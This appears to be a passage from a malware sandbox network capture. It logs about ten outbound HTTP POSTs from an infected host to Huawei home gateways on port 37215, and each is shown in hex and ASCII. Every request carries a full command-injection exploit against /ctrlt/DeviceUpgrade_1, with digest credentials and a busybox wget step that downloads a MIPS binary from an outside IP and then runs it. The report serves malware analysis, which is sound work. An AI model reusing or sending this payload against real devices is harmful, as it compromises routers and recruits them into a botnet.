                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            317192.168.2.1333070197.190.17.12037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.248811960 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            318192.168.2.1349874156.167.167.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.249566078 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            319192.168.2.1358062197.241.255.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.250288963 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            320192.168.2.1350800197.56.46.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.250989914 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            321192.168.2.1351740156.89.192.9537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.251689911 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            322192.168.2.1337234197.176.22.16337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.252449989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            323192.168.2.1342484197.229.179.18737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.253140926 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            324192.168.2.1343078156.243.212.2537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.253813028 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            325192.168.2.133605841.214.194.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.254476070 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            326192.168.2.1355170156.134.168.5837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.255182981 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 